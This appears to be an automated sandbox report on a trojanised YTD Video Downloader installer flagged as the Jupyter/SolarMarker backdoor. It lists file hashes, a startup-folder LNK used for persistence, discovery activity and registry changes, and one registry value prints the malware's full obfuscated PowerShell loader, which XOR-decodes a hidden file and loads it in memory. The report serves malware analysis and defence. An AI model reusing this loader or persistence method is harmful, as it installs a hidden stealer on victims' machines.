C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 d8b973f5f6f30aeed55ce75e8da739ba
SHA1 2b9bc19e2812ef3f955b23f1a86d2b4b8d10f9ec
SHA256 740fdaea6e73edf61251e13deffaa5eed5f30818e6873085eb0b6a3fa63ea707
SHA512 db43111015e045363c3f6863dfdffa489caea8de282757466af85196e4cb965da93aa6d46a63bd4d499f870a8fdf0b85cbc1f563129107ad266939084b3ba1be

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 083165366adc1e40f6da16f5646fb650
SHA1 ec6222bba9830abcd9bb54a9954c3ea75d4b29b1
SHA256 3ffd84e58322292bcd1ccded425e676b1a8bc0a5201567c2438aeade3cb9289f
SHA512 cb4a9189d64b7f2b276a2db0b2016665b6a680fbe7be4aaab76d8282bd301e6415408f238c2af0d7fc78a40d6c358509e53b387ed4031fc2f3826f358fbe654e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 633cc74ad08fac5b5d906cdd8079e5f2
SHA1 b0b7b3b197ea0310a8d3c24ffd256366c5883408
SHA256 ae50a3439f0dfd284a7b27f5c69318daf54e59e183dc28a695c0391fa782f58a
SHA512 735dbc4b9ec888ee6b5754db9082fea7a478eede339bea1920c77e5f8436162948e78d8c70c7a101496709434b308db6e2a7c7feeadaf610f82112b636eaad25

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e434efa0c8909c949ad52044c28ac342
SHA1 edbc8487c33d8d5fa26c72922f28615ba0f80b63
SHA256 6ee6ca2221257d9497afbc293bd122c42e3a0fa3b740045f0c4ad836abf9309d
SHA512 ebf13d459379bb6f9387344e0d30265efa46d034137dcd1680e625851403ac17d1298f94e9ebc7faa2458ccabd37523bf3b4cf152539d175fc04b5d6c9fe29b6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9e78fe126574c70482e1565f4620f6b5
SHA1 1cf4133e2d8332b3d9c8ca31dad3f26ced8b1d0a
SHA256 aa2cbd494b9772431bcb93d50baab99d0fbe6cf1d09162491df5c1f247da8e35
SHA512 01f82f552a9f8f35fc53cc0931f00d83540fa990afe43bc434aec6873d3fe24e9ac5d16505f439b3cbf1f37c0eb1c8b0e20b31cf79158caf177decaa32f818c1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d21d982902a4c301beb28393066348a6
SHA1 a904efdb806630fd9fe974e27fa689b5de4df62c
SHA256 228807ada6e6c08e42f6ed38b5576ac6e07b89b0649980bca7f13d2aa0b761b3
SHA512 59a0b0e9e59dcfd0fdf1f5a5d206a198c43d729988dfabe0523ddd0bf50ae6f58c1d3c6b70ef3006d30d8f281d6800c32780ca4179ff52a2b22f3b54ceeeb154

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8775ad2c9d54368dbba3fd6ef90871af
SHA1 21952b663343053969a9bc6c04ef4b5938d2fba2
SHA256 82b2b856b037bef0aa3f4b0b6c312caab7e5d37f1eb4e312548cc7cbc1b82fb3
SHA512 1d06858fd41bfa98430f41f5bb4340e2c3491e13a49a7f5111693ad2c6dbc7edecad019e39e589422ecd3fa827c664a14c8abe7f8709c405742e0f63e79840e4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 3349e84cbbd92ed821a789533cb83ed9
SHA1 e102b72dd82a264f8cef1ba46728caf1c6131fb3
SHA256 907a771c35db5663055274eb111814045a3c269decd725a57f5b1a5aadbdb4bb
SHA512 e91637992afe02d412b9b214593f850320fad8c08447ab5a71a18b338ffcb1c2856c7e6c5b67e25382fda22a6c47f7fec6d99754c7b529e71e5f7116b6d43bb9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 93fe43789ee91cc07623d643fad97255
SHA1 b140ff26d1cc28ad99c0f8ec5a399daf81d36abe
SHA256 01b4dbda548d54378035a0f7899ded2e4ce1ab7585c89635f4a88deb36a9cbb0
SHA512 ba8c6c46e14c496778f7b60c65ce9350b244a2413a6b69acb31ddfa764456ec3dbe78efe8161d02317b102de02fd56383055f84ebffd4d9ba1b12b0226fac848

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6def2c074cb45dfa167b8bd4dcc53ab2
SHA1 a2b3469ba89814ee0d3581374e28bc3e7b8b53b5
SHA256 8c4236349f96494ecf39e2be7717a7aeead2f2222d9967365b96444f99e87cd6
SHA512 d1c645e724023ef5457cccc77c02c5b3b27d33f917174a140cddad913880520bc435e50d05d4962e190e1c59eeade1f6e14c156703bc4009a370206e106afd1c

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-03 05:18

Reported

2024-10-03 05:21

Platform

win10v2004-20240802-en

Max time kernel

150s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe"

Signatures

Jupyter Backdoor/Client payload

Description Indicator Process Target
N/A N/A N/A N/A

Jupyter, SolarMarker

backdoor trojan stealer jupyter

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\micROSOft\wInDOWs\sTaRT meNU\pRogrAMs\stArtUp\a7b096cca1b4fbb98a4fe4f7d33e9.LNK C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\micROSOft\wInDOWs\sTaRT meNU\pRogrAMs\stArtUp\a7b096cca1b4fbb98a4fe4f7d33e9.LNK C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\micROSOft\wInDOWs\sTaRT meNU\pRogrAMs\stArtUp\a7b096cca1b4fbb98a4fe4f7d33e9.LNK C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\micROSOft\wInDOWs\sTaRT meNU\pRogrAMs\stArtUp\a7b096cca1b4fbb98a4fe4f7d33e9.LNK C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\micROSOft\wInDOWs\sTaRT meNU\pRogrAMs\stArtUp\a7b096cca1b4fbb98a4fe4f7d33e9.LNK C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Users\Admin\AppData\Roaming\micROSOft\wInDOWs\sTaRT meNU\pRogrAMs\stArtUp\a7b096cca1b4fbb98a4fe4f7d33e9.LNK C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A

Checks installed software on the system

discovery

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1035.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1051.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1038.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\scripts.yds C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\access\libfilesystem_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libdrawable_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1036.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libugly_resampler_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\codec\libavcodec_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1060.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res9999.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libvmem_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1026.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1048.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1052.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1055.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res2070.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res2074.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\COPYING.LGPLv2 C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1040.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_mixer\libinteger_mixer_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Uninstall.exe C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\libvlccore.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libtrivial_channel_mixer_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libdirect3d_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libwingdi_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1025.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1043.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\plugins.dat.4584 C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\COPYING.Apachev2 C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libaudio_format_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_output\libdirectsound_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1049.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\librtmp.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_filter\libswscale_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1030.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1033.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1045.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\libvlc.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1044.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1050.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\FFMPEG.EXE C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1031.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1032.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1059.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\manual.bat C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_mixer\libfloat_mixer_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1029.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1061.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\COPYING.LGPLv3 C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\LICENSE C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1053.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1034.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res2052.ini C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ndhqnowpzdefglqlbh\shell\open C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\gayhiusqkilpcm\shell\open\command\ = "PowErshelL -WIndOwStyLE hidDen -EP BypAss -cOmMAND \"$ae101636e6141d9f3ea1c56b4ad19='XjA9VkFeT2xzQ15ORlU3Xk9CJnNAU0JqRUB2eCtiXk9VYHlAeDY8JF5TR2FAQHN5akleUnxuUF5veldfQGBrZ2xAdEthZF5TKyZpXk5POW5eUlNKU15vXn5FXlBzdHlAVW9oZ14wMU1QQHUhUHteTlc8QkB1MFBvQGB8cDdAVHtxbF5SMTxfQHg4ZDReUDBNXkBSWDNaXlFlWkxAYGpTV0B3PlhaXlI9Q3heT21saF5vWD5OQFJXbTw=';$a49d63ef0c64d6896c7325c0e3b6b=[sYStEM.Io.FilE]::reaDALlByTES('C:\\Users\\Admin\\AppData\\Roaming\\mICRoSoFT\\WZkcTmGBguVCNYhSan\\ZCphNMuniDyXoBgVL.GstAbjlkvRZ');FOr($aeb9eaa86f544fbc9f97163012971=0;$aeb9eaa86f544fbc9f97163012971 -Lt $a49d63ef0c64d6896c7325c0e3b6b.COuNT;){fOR($a803f0f737341687c8250cd617801=0;$a803f0f737341687c8250cd617801 -lT $ae101636e6141d9f3ea1c56b4ad19.lEngth;$a803f0f737341687c8250cd617801++){$a49d63ef0c64d6896c7325c0e3b6b[$aeb9eaa86f544fbc9f97163012971]=$a49d63ef0c64d6896c7325c0e3b6b[$aeb9eaa86f544fbc9f97163012971] -bxOr $ae101636e6141d9f3ea1c56b4ad19[$a803f0f737341687c8250cd617801];$aeb9eaa86f544fbc9f97163012971++;IF($aeb9eaa86f544fbc9f97163012971 -Ge $a49d63ef0c64d6896c7325c0e3b6b.cOuNt){$a803f0f737341687c8250cd617801=$ae101636e6141d9f3ea1c56b4ad19.LENGTh}}};[SYsTEm.ReFLecTIoN.AsSeMbLy]::LOad($a49d63ef0c64d6896c7325c0e3b6b);[mArS.deiMos]::inteRaCt()\"" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.ojotbsynykdq C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\txlgibmptcbgefnzkow\shell\open C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.njekblnzhwlihimv\ = "txlgibmptcbgefnzkow" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\qlbwvenckwghjycymhz C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\qlbwvenckwghjycymhz\shell C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\zpinfxlegqavb\shell\open C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
